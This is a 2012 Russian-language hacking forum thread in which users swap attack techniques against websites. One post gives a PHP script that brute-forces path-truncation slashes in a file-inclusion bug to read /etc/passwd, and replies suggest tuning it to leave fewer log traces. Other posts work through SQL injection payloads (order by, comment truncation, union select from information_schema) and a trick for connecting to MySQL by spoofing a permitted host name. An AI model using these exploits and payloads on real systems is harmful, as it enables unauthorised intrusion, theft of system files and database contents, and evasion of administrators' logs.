Старый 28.02.2012, 14:28   #1761
Lostnull
 
Регистрация: 15.01.2012
Сообщений: 64
Репутация: 5
По умолчанию

Ребята, может у кого есть скрипт для автоматизации подбора кол-во слэшей при инклуде (альтернатива нулл байту)?
Lostnull вне форума   Ответить с цитированием
Старый 28.02.2012, 16:11   #1762
M@ZAX@KEP
 
Аватар для M@ZAX@KEP
 
Регистрация: 24.07.2010
Сообщений: 139
Репутация: 5
По умолчанию

Цитата:
Сообщение от Lostnull
Ребята, может у кого есть скрипт для автоматизации подбора кол-во слэшей при инклуде (альтернатива нулл байту)?
Набросал вот... у меня php нормализацию путей не делает, протестить не смог, но должно работать.
PHP код:
<?php
set_time_limit
(0);
error_reporting(E_ALL);

$url "http://localhost/action.php?module="//URL инклуд баги
$include "/etc/passwd"//кого инклудить (можно и урл для RFI сюда)
$detect "root:"//по какой подстроке определить успешнй инклуд
$sleep_seconds 0//таймаут на случай блокировки частых запросов
$numslashes 400//с какого кол-ва слэшей начинать подбор

do {
$slashes str_repeat('/'$numslashes);
sleep($sleep_seconds);
$q $url "../../../../../../../../../../.." $include $slashes;
$page file_get_contents($q);
$numslashes += 1;
} while (!
stristr($page$detect));
$numslashes -= 1;

echo 
$q "<br>Slashes: " $numslashes "<hr>" $page;
?>
/* Алгоритм подбора конечно можно было сделать лучше, но не за 5 минут)) */
M@ZAX@KEP вне форума   Ответить с цитированием
Старый 29.02.2012, 08:51   #1763
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию

Цитата:
Сообщение от M@ZAX@KEP Посмотреть сообщение
Набросал вот... у меня php нормализацию путей не делает, протестить не смог, но должно работать.
PHP код:
<?php
set_time_limit
(0);
error_reporting(E_ALL);

$url "http://localhost/action.php?module="//URL инклуд баги
$include "/etc/passwd"//кого инклудить (можно и урл для RFI сюда)
$detect "root:"//по какой подстроке определить успешнй инклуд
$sleep_seconds 0//таймаут на случай блокировки частых запросов
$numslashes 400//с какого кол-ва слэшей начинать подбор

do {
$slashes str_repeat('/'$numslashes);
sleep($sleep_seconds);
$q $url "../../../../../../../../../../.." $include $slashes;
$page file_get_contents($q);
$numslashes += 1;
} while (!
stristr($page$detect));
$numslashes -= 1;

echo 
$q "<br>Slashes: " $numslashes "<hr>" $page;
?>
/* Алгоритм подбора конечно можно было сделать лучше, но не за 5 минут)) */
Друзья, что тут автоматизировать???
4096 байт всегда работает. Разве что там какой-то substring до этого есть.
А если писать - сделайте дихотомию, такой скрипт ТАК насрет в логи, что инклуд не пригодится )
Начинаешь с 2048, если читается - то заканчиваешь, если нет - увеличиваешь в два раза и т.д.
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
Старый 29.02.2012, 21:15   #1764
M@ZAX@KEP
 
Аватар для M@ZAX@KEP
 
Регистрация: 24.07.2010
Сообщений: 139
Репутация: 5
По умолчанию

Цитата:
А если писать - сделайте дихотомию, такой скрипт ТАК насрет в логи, что инклуд не пригодится )
Согласен, в логах будет жесть. Но для хорошего админа и ручной раскрутки будет достаточно. Можно шаг изменить на 1024 ( $numslashes += 1024; ) и будет уже поприличнее. Про дихотомию (не знал раньше что это так называется =D) была мысль, но стало влом допиливать.
Цитата:
Друзья, что тут автоматизировать??? 4096 байт всегда работает
Я думал, не сработало, если был вопрос?
M@ZAX@KEP вне форума   Ответить с цитированием
Старый 29.02.2012, 23:48   #1765
BRO
 
Регистрация: 15.07.2010
Сообщений: 49
Репутация: 0
По умолчанию

Привет
Делаю запрос
issueid=255+order+by+1--
Пишет в ответ
Error Details:
issueid=255+order+by+1--
Error Executing Database Query. Syntax error or access violation: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Order By DatePublished DESC, ID DESC' at line 2
Дальнейшие действия возможны? Если да- ткните где почитать можно про это.
Спасибо
BRO вне форума   Ответить с цитированием
Старый 01.03.2012, 00:06   #1766
Beched
 
Регистрация: 06.07.2010
Сообщений: 400
Репутация: 118
По умолчанию

Цитата:
Сообщение от BRO Посмотреть сообщение
Привет
Делаю запрос
issueid=255+order+by+1--
Пишет в ответ
Error Details:
issueid=255+order+by+1--
Error Executing Database Query. Syntax error or access violation: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Order By DatePublished DESC, ID DESC' at line 2
Дальнейшие действия возможны? Если да- ткните где почитать можно про это.
Спасибо
Похоже запрос многострочный. Можно попробовать /*, но наверное версия не позволит (без закрывающегося комментария). Можно ещё попробовать отрезать нулл-байтом.
Beched вне форума   Ответить с цитированием
Старый 01.03.2012, 10:11   #1767
BRO
 
Регистрация: 15.07.2010
Сообщений: 49
Репутация: 0
По умолчанию

Цитата:
Сообщение от BECHED aka Root-access Посмотреть сообщение
Похоже запрос многострочный. Можно попробовать /*, но наверное версия не позволит (без закрывающегося комментария). Можно ещё попробовать отрезать нулл-байтом.
Спасибо! /* помогло
BRO вне форума   Ответить с цитированием
Старый 01.03.2012, 17:13   #1768
dr.Pilulkin
 
Регистрация: 04.01.2011
Сообщений: 22
Репутация: 9
По умолчанию

"Хитрый" админ прописал в таблице mysql.user в поле host такую запись "unused%"
Могу ли я подключиться из вне зарегав на левый IP домен типа "unused.blabla.ipq.co" ?
dr.Pilulkin вне форума   Ответить с цитированием
Старый 02.03.2012, 12:38   #1769
Facecontrol
Banned
 
Регистрация: 05.02.2012
Сообщений: 5
Репутация: -5
По умолчанию

А что если имя хостинга не localhost а какой то другой,вот например такое стоит 10.8.0.120.То как тогда составить запрос вот такого типа union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='database' Я вот так вот пробовал ничего не получается,а вот так union select 1,2,group_concat(table_name) from information_schema.tables выводит имена всех таблиц,всех баз данных.
Facecontrol вне форума   Ответить с цитированием
Старый 02.03.2012, 15:38   #1770
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

Цитата:
Сообщение от dr.Pilulkin Посмотреть сообщение
"Хитрый" админ прописал в таблице mysql.user в поле host такую запись "unused%"
Могу ли я подключиться из вне зарегав на левый IP домен типа "unused.blabla.ipq.co" ?
По идее - да, а как на практике... всякие no-ip наверно не предоставляют rdns, и понадобится регать домен?
SynQ вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot